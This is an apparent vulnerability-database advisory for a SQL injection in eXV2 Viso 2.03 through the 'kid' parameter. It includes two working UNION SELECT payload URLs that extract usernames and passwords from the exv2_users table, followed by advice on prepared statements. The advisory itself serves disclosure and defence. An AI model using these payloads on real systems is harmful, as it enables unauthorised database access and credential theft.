vendor:
Viso
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Viso
Affected Version From: 02.03
Affected Version To: 02.03
Patch Exists: NO
Related CWE: N/A
CPE: a:exv2:viso:2.03
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Powered by eXV2 Viso 2.03 SQL Injection
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'kid' parameter to '/modules/viso/index.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information. Exploitation can be done by using two different exploits: 1) modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201 2) modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Mitigation:
Input validation should be performed to ensure that untrusted data is not used to execute unintended commands. It is recommended to use prepared statements, parameterized queries, or stored procedures when interacting with the database.